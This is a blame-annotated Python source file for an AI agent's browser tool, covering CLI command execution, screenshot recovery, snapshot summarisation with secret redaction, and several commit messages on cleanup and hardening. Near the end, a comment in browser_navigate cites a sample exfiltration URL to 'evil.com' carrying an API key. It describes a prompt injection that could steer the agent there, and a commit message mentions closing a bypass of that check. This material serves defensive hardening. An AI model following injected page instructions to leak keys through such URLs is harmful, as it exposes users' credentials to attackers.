- Structure-aware _truncate_snapshot (cut at line boundaries)
Follow-up improvements over contributor's original:
- Move _EMPTY_OK_COMMANDS to module-level frozenset (avoid per-call allocation)
- Fix list+tuple concat in _run_browser_command PATH construction
- Update test_browser_homebrew_paths.py for tuple returns and cache fixtures
Co-authored-by: kshitijk4poor <82637225+kshitijk4poor@users.noreply.github.com>
Closes #7168, closes #7171, closes #7172, closes #7173
2026-04-10 13:00:23 -07:00
# Nothing found — cache the failure so subsequent calls don't re-scan.
_agent_browser_resolved = True
2026-01-29 06:10:24 +00:00
raise FileNotFoundError (
2026-04-09 13:46:08 +02:00
" agent-browser CLI not found. Install it with: "
f " { _browser_install_hint ( ) } \n "
2026-02-09 04:35:25 +00:00
" Or run ' npm install ' in the repo root to install locally. \n "
2026-01-29 06:10:24 +00:00
" Or ensure npx is available in your PATH. "
)
Fix browser cleanup consistency and screenshot recovery
Unify browser session teardown so manual close, inactivity cleanup, and emergency shutdown all follow the same cleanup path instead of partially duplicating logic.
This changes browser_close() to delegate to cleanup_browser(), which means recording shutdown, Browserbase release, activity bookkeeping cleanup, and local socket-directory removal now happen consistently. It also updates emergency cleanup to route through cleanup_all_browsers() and explicitly clear in-memory tracking state after teardown so stale active-session, last-activity, and recording entries are not left behind on exit.
The screenshot fallback path has also been fixed. _extract_screenshot_path_from_text() now matches real absolute PNG paths, including quoted output, so browser_vision() can recover screenshots when agent-browser emits human-readable text instead of JSON.
Regression coverage was added in tests/tools/test_browser_cleanup.py for screenshot path extraction, cleanup_browser() state removal, browser_close() delegation, and emergency cleanup state clearing.
Verified with:
- python -m pytest tests/tools/test_browser_cleanup.py -q
- python -m pytest tests/tools/test_browser_console.py tests/gateway/test_send_image_file.py -q
2026-03-12 02:49:24 +01:00
def _extract_screenshot_path_from_text ( text : str ) - > Optional [ str ] :
""" Extract a screenshot file path from agent-browser human-readable output. """
if not text :
return None
patterns = [
r " Screenshot saved to [ ' \" ](?P<path>/[^ ' \" ]+? \ .png)[ ' \" ] " ,
r " Screenshot saved to (?P<path>/ \ S+? \ .png)(?: \ s|$) " ,
r " (?P<path>/ \ S+? \ .png)(?: \ s|$) " ,
]
for pattern in patterns :
match = re . search ( pattern , text )
if match :
path = match . group ( " path " ) . strip ( ) . strip ( " ' \" " )
if path :
return path
return None
2026-01-29 06:10:24 +00:00
def _run_browser_command (
task_id : str ,
command : str ,
args : List [ str ] = None ,
2026-03-24 07:21:50 -07:00
timeout : Optional [ int ] = None ,
2026-01-29 06:10:24 +00:00
) - > Dict [ str , Any ] :
"""
Run an agent - browser CLI command using our pre - created Browserbase session .
2026-03-14 11:34:31 -07:00
2026-01-29 06:10:24 +00:00
Args :
task_id : Task identifier to get the right session
command : The command to run ( e . g . , " open " , " click " )
args : Additional arguments for the command
2026-03-24 07:21:50 -07:00
timeout : Command timeout in seconds . ` ` None ` ` reads
` ` browser . command_timeout ` ` from config ( default 30 s ) .
2026-03-14 11:34:31 -07:00
2026-01-29 06:10:24 +00:00
Returns :
Parsed JSON response from agent - browser
"""
2026-03-24 07:21:50 -07:00
if timeout is None :
timeout = _get_command_timeout ( )
2026-01-29 06:10:24 +00:00
args = args or [ ]
2026-03-14 11:34:31 -07:00
2026-01-29 06:10:24 +00:00
# Build the command
try :
browser_cmd = _find_agent_browser ( )
except FileNotFoundError as e :
2026-03-08 19:54:32 -07:00
logger . warning ( " agent-browser CLI not found: %s " , e )
2026-01-29 06:10:24 +00:00
return { " success " : False , " error " : str ( e ) }
2026-04-09 14:16:58 +02:00
if _requires_real_termux_browser_install ( browser_cmd ) :
error = _termux_browser_install_error ( )
logger . warning ( " browser command blocked on Termux: %s " , error )
return { " success " : False , " error " : error }
2026-03-14 11:34:31 -07:00
2026-02-23 02:11:33 -08:00
from tools . interrupt import is_interrupted
if is_interrupted ( ) :
return { " success " : False , " error " : " Interrupted " }
2026-01-29 06:10:24 +00:00
# Get session info (creates Browserbase session with proxies if needed)
try :
session_info = _get_session_info ( task_id )
except Exception as e :
2026-03-14 11:34:31 -07:00
logger . warning ( " Failed to create browser session for task= %s : %s " , task_id , e )
2026-01-29 06:10:24 +00:00
return { " success " : False , " error " : f " Failed to create browser session: { str ( e ) } " }
2026-03-14 11:34:31 -07:00
2026-03-07 01:14:57 -08:00
# Build the command with the appropriate backend flag.
# Cloud mode: --cdp <websocket_url> connects to Browserbase.
# Local mode: --session <name> launches a local headless Chromium.
# The rest of the command (--json, command, args) is identical.
if session_info . get ( " cdp_url " ) :
# Cloud mode — connect to remote Browserbase browser via CDP
# IMPORTANT: Do NOT use --session with --cdp. In agent-browser >=0.13,
# --session creates a local browser instance and silently ignores --cdp.
backend_args = [ " --cdp " , session_info [ " cdp_url " ] ]
else :
# Local mode — launch a headless Chromium instance
backend_args = [ " --session " , session_info [ " session_name " ] ]
2026-04-08 13:53:51 +05:30
# Keep concrete executable paths intact, even when they contain spaces.
# Only the synthetic npx fallback needs to expand into multiple argv items.
cmd_prefix = [ " npx " , " agent-browser " ] if browser_cmd == " npx agent-browser " else [ browser_cmd ]
cmd_parts = cmd_prefix + backend_args + [
2026-02-21 00:54:01 -08:00
" --json " ,
2026-01-29 06:10:24 +00:00
command
] + args
2026-03-14 11:34:31 -07:00
2026-01-29 06:10:24 +00:00
try :
2026-02-09 04:35:25 +00:00
# Give each task its own socket directory to prevent concurrency conflicts.
# Without this, parallel workers fight over the same default socket path,
# causing "Failed to create socket directory: Permission denied" errors.
task_socket_dir = os . path . join (
2026-03-08 19:31:23 -07:00
_socket_safe_tmpdir ( ) ,
2026-02-09 04:35:25 +00:00
f " agent-browser- { session_info [ ' session_name ' ] } "
)
2026-03-08 19:31:23 -07:00
os . makedirs ( task_socket_dir , mode = 0o700 , exist_ok = True )
fix: two process leaks (agent-browser daemons, paste.rs sleepers) (#11843)
Both fixes close process leaks observed in production (18+ orphaned
agent-browser node daemons, 15+ orphaned paste.rs sleep interpreters
accumulated over ~3 days, ~2.7 GB RSS).
## agent-browser daemon leak
Previously the orphan reaper (_reap_orphaned_browser_sessions) only ran
from _start_browser_cleanup_thread, which is only invoked on the first
browser tool call in a process. Hermes sessions that never used the
browser never swept orphans, and the cross-process orphan detection
relied on in-process _active_sessions, which doesn't see other hermes
PIDs' sessions (race risk).
- Write <session>.owner_pid alongside the socket dir recording the
hermes PID that owns the daemon (extracted into _write_owner_pid for
direct testability).
- Reaper prefers owner_pid liveness over in-process _active_sessions.
Cross-process safe: concurrent hermes instances won't reap each
other's daemons. Legacy tracked_names fallback kept for daemons
that predate owner_pid.
- atexit handler (_emergency_cleanup_all_sessions) now always runs
the reaper, not just when this process had active sessions —
every clean hermes exit sweeps accumulated orphans.
## paste.rs auto-delete leak
_schedule_auto_delete spawned a detached Python subprocess per call
that slept 6 hours then issued DELETE requests. No dedup, no tracking —
every 'hermes debug share' invocation added ~20 MB of resident Python
interpreters that stuck around until the sleep finished.
- Replaced the spawn with ~/.hermes/pastes/pending.json: records
{url, expire_at} entries.
- _sweep_expired_pastes() synchronously DELETEs past-due entries on
every 'hermes debug' invocation (run_debug() dispatcher).
- Network failures stay in pending.json for up to 24h, then give up
(paste.rs's own retention handles the 'user never runs hermes again'
edge case).
- Zero subprocesses; regression test asserts subprocess/Popen/time.sleep
never appear in the function source (skipping docstrings via AST).
## Validation
| | Before | After |
|------------------------------|---------------|--------------|
| Orphan agent-browser daemons | 18 accumulated| 2 (live) |
| paste.rs sleep interpreters | 15 accumulated| 0 |
| RSS reclaimed | - | ~2.7 GB |
| Targeted tests | - | 2253 pass |
E2E verified: alive-owner daemons NOT reaped; dead-owner daemons
SIGTERM'd and socket dirs cleaned; pending.json sweep deletes expired
entries without spawning subprocesses.
2026-04-17 18:46:30 -07:00
# Record this hermes PID as the session owner (cross-process safe
# orphan detection — see _write_owner_pid).
_write_owner_pid ( task_socket_dir , session_info [ ' session_name ' ] )
2026-03-08 19:54:32 -07:00
logger . debug ( " browser cmd= %s task= %s socket_dir= %s ( %d chars) " ,
command , task_id , task_socket_dir , len ( task_socket_dir ) )
2026-03-14 11:34:31 -07:00
2026-03-08 04:08:41 -07:00
browser_env = { * * os . environ }
Fix browser cleanup consistency and screenshot recovery
Unify browser session teardown so manual close, inactivity cleanup, and emergency shutdown all follow the same cleanup path instead of partially duplicating logic.
This changes browser_close() to delegate to cleanup_browser(), which means recording shutdown, Browserbase release, activity bookkeeping cleanup, and local socket-directory removal now happen consistently. It also updates emergency cleanup to route through cleanup_all_browsers() and explicitly clear in-memory tracking state after teardown so stale active-session, last-activity, and recording entries are not left behind on exit.
The screenshot fallback path has also been fixed. _extract_screenshot_path_from_text() now matches real absolute PNG paths, including quoted output, so browser_vision() can recover screenshots when agent-browser emits human-readable text instead of JSON.
Regression coverage was added in tests/tools/test_browser_cleanup.py for screenshot path extraction, cleanup_browser() state removal, browser_close() delegation, and emergency cleanup state clearing.
Verified with:
- python -m pytest tests/tools/test_browser_cleanup.py -q
- python -m pytest tests/tools/test_browser_console.py tests/gateway/test_send_image_file.py -q
2026-03-12 02:49:24 +01:00
2026-04-14 16:47:36 -07:00
# Ensure subprocesses inherit the same browser-specific PATH fallbacks
# used during CLI discovery.
browser_env [ " PATH " ] = _merge_browser_path ( browser_env . get ( " PATH " , " " ) )
2026-03-08 04:08:41 -07:00
browser_env [ " AGENT_BROWSER_SOCKET_DIR " ] = task_socket_dir
2026-04-22 23:05:42 +05:30
# Tell the agent-browser daemon to self-terminate after being idle
# for our configured inactivity timeout. This is the daemon-side
# counterpart to our Python-side _cleanup_inactive_browser_sessions
# — the daemon kills itself and its Chrome children when no CLI
# commands arrive within the window. Added in agent-browser 0.24.
if " AGENT_BROWSER_IDLE_TIMEOUT_MS " not in browser_env :
idle_ms = str ( BROWSER_SESSION_INACTIVITY_TIMEOUT * 1000 )
browser_env [ " AGENT_BROWSER_IDLE_TIMEOUT_MS " ] = idle_ms
2026-03-14 11:34:31 -07:00
2026-03-17 00:16:34 -07:00
# Use temp files for stdout/stderr instead of pipes.
# agent-browser starts a background daemon that inherits file
# descriptors. With capture_output=True (pipes), the daemon keeps
# the pipe fds open after the CLI exits, so communicate() never
# sees EOF and blocks until the timeout fires.
stdout_path = os . path . join ( task_socket_dir , f " _stdout_ { command } " )
stderr_path = os . path . join ( task_socket_dir , f " _stderr_ { command } " )
stdout_fd = os . open ( stdout_path , os . O_WRONLY | os . O_CREAT | os . O_TRUNC , 0o600 )
stderr_fd = os . open ( stderr_path , os . O_WRONLY | os . O_CREAT | os . O_TRUNC , 0o600 )
try :
proc = subprocess . Popen (
cmd_parts ,
stdout = stdout_fd ,
stderr = stderr_fd ,
stdin = subprocess . DEVNULL ,
env = browser_env ,
)
finally :
os . close ( stdout_fd )
os . close ( stderr_fd )
try :
proc . wait ( timeout = timeout )
except subprocess . TimeoutExpired :
proc . kill ( )
proc . wait ( )
logger . warning ( " browser ' %s ' timed out after %d s (task= %s , socket_dir= %s ) " ,
command , timeout , task_id , task_socket_dir )
return { " success " : False , " error " : f " Command timed out after { timeout } seconds " }
with open ( stdout_path , " r " ) as f :
stdout = f . read ( )
with open ( stderr_path , " r " ) as f :
stderr = f . read ( )
returncode = proc . returncode
# Clean up temp files (best-effort)
for p in ( stdout_path , stderr_path ) :
try :
os . unlink ( p )
except OSError :
pass
2026-03-08 04:08:41 -07:00
# Log stderr for diagnostics — use warning level on failure so it's visible
2026-03-17 00:16:34 -07:00
if stderr and stderr . strip ( ) :
level = logging . WARNING if returncode != 0 else logging . DEBUG
logger . log ( level , " browser ' %s ' stderr: %s " , command , stderr . strip ( ) [ : 500 ] )
2026-03-14 11:34:31 -07:00
2026-03-17 00:16:34 -07:00
stdout_text = stdout . strip ( )
Fix browser cleanup consistency and screenshot recovery
Unify browser session teardown so manual close, inactivity cleanup, and emergency shutdown all follow the same cleanup path instead of partially duplicating logic.
This changes browser_close() to delegate to cleanup_browser(), which means recording shutdown, Browserbase release, activity bookkeeping cleanup, and local socket-directory removal now happen consistently. It also updates emergency cleanup to route through cleanup_all_browsers() and explicitly clear in-memory tracking state after teardown so stale active-session, last-activity, and recording entries are not left behind on exit.
The screenshot fallback path has also been fixed. _extract_screenshot_path_from_text() now matches real absolute PNG paths, including quoted output, so browser_vision() can recover screenshots when agent-browser emits human-readable text instead of JSON.
Regression coverage was added in tests/tools/test_browser_cleanup.py for screenshot path extraction, cleanup_browser() state removal, browser_close() delegation, and emergency cleanup state clearing.
Verified with:
- python -m pytest tests/tools/test_browser_cleanup.py -q
- python -m pytest tests/tools/test_browser_console.py tests/gateway/test_send_image_file.py -q
2026-03-12 02:49:24 +01:00
fix(browser): hardening — dead code, caching, scroll perf, security, thread safety
Salvaged from PR #7276 (hardening-only subset; excluded 6 new tools
and unrelated scope additions from the contributor's commit).
- Remove dead DEFAULT_SESSION_TIMEOUT and unregistered browser_close schema
- Fix _camofox_eval wrong call signatures (_ensure_tab, _post args)
- Cache _find_agent_browser, _get_command_timeout, _discover_homebrew_node_dirs
- Replace 5x subprocess scroll loop with single pixel-arg call
- URL-decode before secret exfiltration check (bypass prevention)
- Protect _recording_sessions with _cleanup_lock (thread safety)
- Return failure on empty stdout instead of silent success
- Structure-aware _truncate_snapshot (cut at line boundaries)
Follow-up improvements over contributor's original:
- Move _EMPTY_OK_COMMANDS to module-level frozenset (avoid per-call allocation)
- Fix list+tuple concat in _run_browser_command PATH construction
- Update test_browser_homebrew_paths.py for tuple returns and cache fixtures
Co-authored-by: kshitijk4poor <82637225+kshitijk4poor@users.noreply.github.com>
Closes #7168, closes #7171, closes #7172, closes #7173
2026-04-10 13:00:23 -07:00
# Empty output with rc=0 is a broken state — treat as failure rather
# than silently returning {"success": True, "data": {}}.
# Some commands (close, record) legitimately return no output.
if not stdout_text and returncode == 0 and command not in _EMPTY_OK_COMMANDS :
logger . warning ( " browser ' %s ' returned empty output (rc=0) " , command )
return { " success " : False , " error " : f " Browser command ' { command } ' returned no output " }
Fix browser cleanup consistency and screenshot recovery
Unify browser session teardown so manual close, inactivity cleanup, and emergency shutdown all follow the same cleanup path instead of partially duplicating logic.
This changes browser_close() to delegate to cleanup_browser(), which means recording shutdown, Browserbase release, activity bookkeeping cleanup, and local socket-directory removal now happen consistently. It also updates emergency cleanup to route through cleanup_all_browsers() and explicitly clear in-memory tracking state after teardown so stale active-session, last-activity, and recording entries are not left behind on exit.
The screenshot fallback path has also been fixed. _extract_screenshot_path_from_text() now matches real absolute PNG paths, including quoted output, so browser_vision() can recover screenshots when agent-browser emits human-readable text instead of JSON.
Regression coverage was added in tests/tools/test_browser_cleanup.py for screenshot path extraction, cleanup_browser() state removal, browser_close() delegation, and emergency cleanup state clearing.
Verified with:
- python -m pytest tests/tools/test_browser_cleanup.py -q
- python -m pytest tests/tools/test_browser_console.py tests/gateway/test_send_image_file.py -q
2026-03-12 02:49:24 +01:00
if stdout_text :
2026-01-29 06:10:24 +00:00
try :
Fix browser cleanup consistency and screenshot recovery
Unify browser session teardown so manual close, inactivity cleanup, and emergency shutdown all follow the same cleanup path instead of partially duplicating logic.
This changes browser_close() to delegate to cleanup_browser(), which means recording shutdown, Browserbase release, activity bookkeeping cleanup, and local socket-directory removal now happen consistently. It also updates emergency cleanup to route through cleanup_all_browsers() and explicitly clear in-memory tracking state after teardown so stale active-session, last-activity, and recording entries are not left behind on exit.
The screenshot fallback path has also been fixed. _extract_screenshot_path_from_text() now matches real absolute PNG paths, including quoted output, so browser_vision() can recover screenshots when agent-browser emits human-readable text instead of JSON.
Regression coverage was added in tests/tools/test_browser_cleanup.py for screenshot path extraction, cleanup_browser() state removal, browser_close() delegation, and emergency cleanup state clearing.
Verified with:
- python -m pytest tests/tools/test_browser_cleanup.py -q
- python -m pytest tests/tools/test_browser_console.py tests/gateway/test_send_image_file.py -q
2026-03-12 02:49:24 +01:00
parsed = json . loads ( stdout_text )
2026-03-14 11:34:31 -07:00
# Warn if snapshot came back empty (common sign of daemon/CDP issues)
2026-02-21 00:27:35 -08:00
if command == " snapshot " and parsed . get ( " success " ) :
snap_data = parsed . get ( " data " , { } )
if not snap_data . get ( " snapshot " ) and not snap_data . get ( " refs " ) :
2026-02-21 03:11:11 -08:00
logger . warning ( " snapshot returned empty content. "
" Possible stale daemon or CDP connection issue. "
2026-03-17 00:16:34 -07:00
" returncode= %s " , returncode )
2026-02-21 00:27:35 -08:00
return parsed
2026-01-29 06:10:24 +00:00
except json . JSONDecodeError :
Fix browser cleanup consistency and screenshot recovery
Unify browser session teardown so manual close, inactivity cleanup, and emergency shutdown all follow the same cleanup path instead of partially duplicating logic.
This changes browser_close() to delegate to cleanup_browser(), which means recording shutdown, Browserbase release, activity bookkeeping cleanup, and local socket-directory removal now happen consistently. It also updates emergency cleanup to route through cleanup_all_browsers() and explicitly clear in-memory tracking state after teardown so stale active-session, last-activity, and recording entries are not left behind on exit.
The screenshot fallback path has also been fixed. _extract_screenshot_path_from_text() now matches real absolute PNG paths, including quoted output, so browser_vision() can recover screenshots when agent-browser emits human-readable text instead of JSON.
Regression coverage was added in tests/tools/test_browser_cleanup.py for screenshot path extraction, cleanup_browser() state removal, browser_close() delegation, and emergency cleanup state clearing.
Verified with:
- python -m pytest tests/tools/test_browser_cleanup.py -q
- python -m pytest tests/tools/test_browser_console.py tests/gateway/test_send_image_file.py -q
2026-03-12 02:49:24 +01:00
raw = stdout_text [ : 2000 ]
2026-03-08 19:54:32 -07:00
logger . warning ( " browser ' %s ' returned non-JSON output (rc= %s ): %s " ,
2026-03-17 00:16:34 -07:00
command , returncode , raw [ : 500 ] )
Fix browser cleanup consistency and screenshot recovery
Unify browser session teardown so manual close, inactivity cleanup, and emergency shutdown all follow the same cleanup path instead of partially duplicating logic.
This changes browser_close() to delegate to cleanup_browser(), which means recording shutdown, Browserbase release, activity bookkeeping cleanup, and local socket-directory removal now happen consistently. It also updates emergency cleanup to route through cleanup_all_browsers() and explicitly clear in-memory tracking state after teardown so stale active-session, last-activity, and recording entries are not left behind on exit.
The screenshot fallback path has also been fixed. _extract_screenshot_path_from_text() now matches real absolute PNG paths, including quoted output, so browser_vision() can recover screenshots when agent-browser emits human-readable text instead of JSON.
Regression coverage was added in tests/tools/test_browser_cleanup.py for screenshot path extraction, cleanup_browser() state removal, browser_close() delegation, and emergency cleanup state clearing.
Verified with:
- python -m pytest tests/tools/test_browser_cleanup.py -q
- python -m pytest tests/tools/test_browser_console.py tests/gateway/test_send_image_file.py -q
2026-03-12 02:49:24 +01:00
if command == " screenshot " :
2026-03-17 00:16:34 -07:00
stderr_text = ( stderr or " " ) . strip ( )
Fix browser cleanup consistency and screenshot recovery
Unify browser session teardown so manual close, inactivity cleanup, and emergency shutdown all follow the same cleanup path instead of partially duplicating logic.
This changes browser_close() to delegate to cleanup_browser(), which means recording shutdown, Browserbase release, activity bookkeeping cleanup, and local socket-directory removal now happen consistently. It also updates emergency cleanup to route through cleanup_all_browsers() and explicitly clear in-memory tracking state after teardown so stale active-session, last-activity, and recording entries are not left behind on exit.
The screenshot fallback path has also been fixed. _extract_screenshot_path_from_text() now matches real absolute PNG paths, including quoted output, so browser_vision() can recover screenshots when agent-browser emits human-readable text instead of JSON.
Regression coverage was added in tests/tools/test_browser_cleanup.py for screenshot path extraction, cleanup_browser() state removal, browser_close() delegation, and emergency cleanup state clearing.
Verified with:
- python -m pytest tests/tools/test_browser_cleanup.py -q
- python -m pytest tests/tools/test_browser_console.py tests/gateway/test_send_image_file.py -q
2026-03-12 02:49:24 +01:00
combined_text = " \n " . join (
part for part in [ stdout_text , stderr_text ] if part
)
2026-03-14 11:34:31 -07:00
recovered_path = _extract_screenshot_path_from_text ( combined_text )
Fix browser cleanup consistency and screenshot recovery
Unify browser session teardown so manual close, inactivity cleanup, and emergency shutdown all follow the same cleanup path instead of partially duplicating logic.
This changes browser_close() to delegate to cleanup_browser(), which means recording shutdown, Browserbase release, activity bookkeeping cleanup, and local socket-directory removal now happen consistently. It also updates emergency cleanup to route through cleanup_all_browsers() and explicitly clear in-memory tracking state after teardown so stale active-session, last-activity, and recording entries are not left behind on exit.
The screenshot fallback path has also been fixed. _extract_screenshot_path_from_text() now matches real absolute PNG paths, including quoted output, so browser_vision() can recover screenshots when agent-browser emits human-readable text instead of JSON.
Regression coverage was added in tests/tools/test_browser_cleanup.py for screenshot path extraction, cleanup_browser() state removal, browser_close() delegation, and emergency cleanup state clearing.
Verified with:
- python -m pytest tests/tools/test_browser_cleanup.py -q
- python -m pytest tests/tools/test_browser_console.py tests/gateway/test_send_image_file.py -q
2026-03-12 02:49:24 +01:00
if recovered_path and Path ( recovered_path ) . exists ( ) :
logger . info (
" browser ' screenshot ' recovered file from non-JSON output: %s " ,
recovered_path ,
)
return {
" success " : True ,
" data " : {
" path " : recovered_path ,
" raw " : raw ,
} ,
}
2026-01-29 06:10:24 +00:00
return {
Fix browser cleanup consistency and screenshot recovery
Unify browser session teardown so manual close, inactivity cleanup, and emergency shutdown all follow the same cleanup path instead of partially duplicating logic.
This changes browser_close() to delegate to cleanup_browser(), which means recording shutdown, Browserbase release, activity bookkeeping cleanup, and local socket-directory removal now happen consistently. It also updates emergency cleanup to route through cleanup_all_browsers() and explicitly clear in-memory tracking state after teardown so stale active-session, last-activity, and recording entries are not left behind on exit.
The screenshot fallback path has also been fixed. _extract_screenshot_path_from_text() now matches real absolute PNG paths, including quoted output, so browser_vision() can recover screenshots when agent-browser emits human-readable text instead of JSON.
Regression coverage was added in tests/tools/test_browser_cleanup.py for screenshot path extraction, cleanup_browser() state removal, browser_close() delegation, and emergency cleanup state clearing.
Verified with:
- python -m pytest tests/tools/test_browser_cleanup.py -q
- python -m pytest tests/tools/test_browser_console.py tests/gateway/test_send_image_file.py -q
2026-03-12 02:49:24 +01:00
" success " : False ,
" error " : f " Non-JSON output from agent-browser for ' { command } ' : { raw } "
2026-01-29 06:10:24 +00:00
}
2026-03-14 11:34:31 -07:00
2026-01-29 06:10:24 +00:00
# Check for errors
2026-03-17 00:16:34 -07:00
if returncode != 0 :
error_msg = stderr . strip ( ) if stderr else f " Command failed with code { returncode } "
logger . warning ( " browser ' %s ' failed (rc= %s ): %s " , command , returncode , error_msg [ : 300 ] )
2026-01-29 06:10:24 +00:00
return { " success " : False , " error " : error_msg }
2026-03-14 11:34:31 -07:00
2026-01-29 06:10:24 +00:00
return { " success " : True , " data " : { } }
2026-03-14 11:34:31 -07:00
2026-01-29 06:10:24 +00:00
except Exception as e :
2026-03-08 19:54:32 -07:00
logger . warning ( " browser ' %s ' exception: %s " , command , e , exc_info = True )
2026-01-29 06:10:24 +00:00
return { " success " : False , " error " : str ( e ) }
2026-02-22 02:16:11 -08:00
def _extract_relevant_content (
2026-01-29 06:10:24 +00:00
snapshot_text : str ,
user_task : Optional [ str ] = None
) - > str :
2026-02-22 02:16:11 -08:00
""" Use LLM to extract relevant content from a snapshot based on the user ' s task.
2026-03-07 08:52:06 -08:00
Falls back to simple truncation when no auxiliary text model is configured .
2026-01-29 06:10:24 +00:00
"""
2026-02-22 02:16:11 -08:00
if user_task :
extraction_prompt = (
f " You are a content extractor for a browser automation agent. \n \n "
f " The user ' s task is: { user_task } \n \n "
f " Given the following page snapshot (accessibility tree representation), "
f " extract and summarize the most relevant information for completing this task. Focus on: \n "
f " 1. Interactive elements (buttons, links, inputs) that might be needed \n "
f " 2. Text content relevant to the task (prices, descriptions, headings, important info) \n "
f " 3. Navigation structure if relevant \n \n "
f " Keep ref IDs (like [ref=e5]) for interactive elements so the agent can use them. \n \n "
f " Page Snapshot: \n { snapshot_text } \n \n "
f " Provide a concise summary that preserves actionable information and relevant content. "
)
2026-01-29 06:10:24 +00:00
else :
2026-02-22 02:16:11 -08:00
extraction_prompt = (
f " Summarize this page snapshot, preserving: \n "
f " 1. All interactive elements with their ref IDs (like [ref=e5]) \n "
f " 2. Key text content and headings \n "
f " 3. Important information visible on the page \n \n "
f " Page Snapshot: \n { snapshot_text } \n \n "
f " Provide a concise summary focused on interactive elements and key content. "
)
2026-01-29 06:10:24 +00:00
2026-04-01 02:04:13 +03:00
# Redact secrets from snapshot before sending to auxiliary LLM.
# Without this, a page displaying env vars or API keys would leak
# secrets to the extraction model before run_agent.py's general
# redaction layer ever sees the tool result.
from agent . redact import redact_sensitive_text
extraction_prompt = redact_sensitive_text ( extraction_prompt )
2026-01-29 06:10:24 +00:00
try :
2026-03-11 20:52:19 -07:00
call_kwargs = {
" task " : " web_extract " ,
" messages " : [ { " role " : " user " , " content " : extraction_prompt } ] ,
" max_tokens " : 4000 ,
" temperature " : 0.1 ,
}
model = _get_extraction_model ( )
if model :
call_kwargs [ " model " ] = model
response = call_llm ( * * call_kwargs )
2026-04-01 02:08:58 +03:00
extracted = ( response . choices [ 0 ] . message . content or " " ) . strip ( ) or _truncate_snapshot ( snapshot_text )
# Redact any secrets the auxiliary LLM may have echoed back.
return redact_sensitive_text ( extracted )
2026-01-29 06:10:24 +00:00
except Exception :
return _truncate_snapshot ( snapshot_text )
def _truncate_snapshot ( snapshot_text : str , max_chars : int = 8000 ) - > str :
fix(browser): hardening — dead code, caching, scroll perf, security, thread safety
Salvaged from PR #7276 (hardening-only subset; excluded 6 new tools
and unrelated scope additions from the contributor's commit).
- Remove dead DEFAULT_SESSION_TIMEOUT and unregistered browser_close schema
- Fix _camofox_eval wrong call signatures (_ensure_tab, _post args)
- Cache _find_agent_browser, _get_command_timeout, _discover_homebrew_node_dirs
- Replace 5x subprocess scroll loop with single pixel-arg call
- URL-decode before secret exfiltration check (bypass prevention)
- Protect _recording_sessions with _cleanup_lock (thread safety)
- Return failure on empty stdout instead of silent success
- Structure-aware _truncate_snapshot (cut at line boundaries)
Follow-up improvements over contributor's original:
- Move _EMPTY_OK_COMMANDS to module-level frozenset (avoid per-call allocation)
- Fix list+tuple concat in _run_browser_command PATH construction
- Update test_browser_homebrew_paths.py for tuple returns and cache fixtures
Co-authored-by: kshitijk4poor <82637225+kshitijk4poor@users.noreply.github.com>
Closes #7168, closes #7171, closes #7172, closes #7173
2026-04-10 13:00:23 -07:00
""" Structure-aware truncation for snapshots.
Cuts at line boundaries so that accessibility tree elements are never
split mid - line , and appends a note telling the agent how much was
omitted .
2026-01-29 06:10:24 +00:00
Args :
snapshot_text : The snapshot text to truncate
max_chars : Maximum characters to keep
fix(browser): hardening — dead code, caching, scroll perf, security, thread safety
Salvaged from PR #7276 (hardening-only subset; excluded 6 new tools
and unrelated scope additions from the contributor's commit).
- Remove dead DEFAULT_SESSION_TIMEOUT and unregistered browser_close schema
- Fix _camofox_eval wrong call signatures (_ensure_tab, _post args)
- Cache _find_agent_browser, _get_command_timeout, _discover_homebrew_node_dirs
- Replace 5x subprocess scroll loop with single pixel-arg call
- URL-decode before secret exfiltration check (bypass prevention)
- Protect _recording_sessions with _cleanup_lock (thread safety)
- Return failure on empty stdout instead of silent success
- Structure-aware _truncate_snapshot (cut at line boundaries)
Follow-up improvements over contributor's original:
- Move _EMPTY_OK_COMMANDS to module-level frozenset (avoid per-call allocation)
- Fix list+tuple concat in _run_browser_command PATH construction
- Update test_browser_homebrew_paths.py for tuple returns and cache fixtures
Co-authored-by: kshitijk4poor <82637225+kshitijk4poor@users.noreply.github.com>
Closes #7168, closes #7171, closes #7172, closes #7173
2026-04-10 13:00:23 -07:00
2026-01-29 06:10:24 +00:00
Returns :
Truncated text with indicator if truncated
"""
if len ( snapshot_text ) < = max_chars :
return snapshot_text
fix(browser): hardening — dead code, caching, scroll perf, security, thread safety
Salvaged from PR #7276 (hardening-only subset; excluded 6 new tools
and unrelated scope additions from the contributor's commit).
- Remove dead DEFAULT_SESSION_TIMEOUT and unregistered browser_close schema
- Fix _camofox_eval wrong call signatures (_ensure_tab, _post args)
- Cache _find_agent_browser, _get_command_timeout, _discover_homebrew_node_dirs
- Replace 5x subprocess scroll loop with single pixel-arg call
- URL-decode before secret exfiltration check (bypass prevention)
- Protect _recording_sessions with _cleanup_lock (thread safety)
- Return failure on empty stdout instead of silent success
- Structure-aware _truncate_snapshot (cut at line boundaries)
Follow-up improvements over contributor's original:
- Move _EMPTY_OK_COMMANDS to module-level frozenset (avoid per-call allocation)
- Fix list+tuple concat in _run_browser_command PATH construction
- Update test_browser_homebrew_paths.py for tuple returns and cache fixtures
Co-authored-by: kshitijk4poor <82637225+kshitijk4poor@users.noreply.github.com>
Closes #7168, closes #7171, closes #7172, closes #7173
2026-04-10 13:00:23 -07:00
lines = snapshot_text . split ( ' \n ' )
result : list [ str ] = [ ]
chars = 0
for line in lines :
if chars + len ( line ) + 1 > max_chars - 80 : # reserve space for note
break
result . append ( line )
chars + = len ( line ) + 1
remaining = len ( lines ) - len ( result )
if remaining > 0 :
result . append ( f ' \n [... { remaining } more lines truncated, use browser_snapshot for full content] ' )
return ' \n ' . join ( result )
2026-01-29 06:10:24 +00:00
# ============================================================================
# Browser Tool Functions
# ============================================================================
def browser_navigate ( url : str , task_id : Optional [ str ] = None ) - > str :
"""
Navigate to a URL in the browser .
2026-03-14 11:34:31 -07:00
2026-01-29 06:10:24 +00:00
Args :
url : The URL to navigate to
task_id : Task identifier for session isolation
2026-03-14 11:34:31 -07:00
2026-01-29 06:10:24 +00:00
Returns :
JSON string with navigation result ( includes stealth features info on first nav )
"""
2026-04-01 02:04:13 +03:00
# Secret exfiltration protection — block URLs that embed API keys or
# tokens in query parameters. A prompt injection could trick the agent
# into navigating to https://evil.com/steal?key=sk-ant-... to exfil secrets.
fix(browser): hardening — dead code, caching, scroll perf, security, thread safety
Salvaged from PR #7276 (hardening-only subset; excluded 6 new tools
and unrelated scope additions from the contributor's commit).
- Remove dead DEFAULT_SESSION_TIMEOUT and unregistered browser_close schema
- Fix _camofox_eval wrong call signatures (_ensure_tab, _post args)
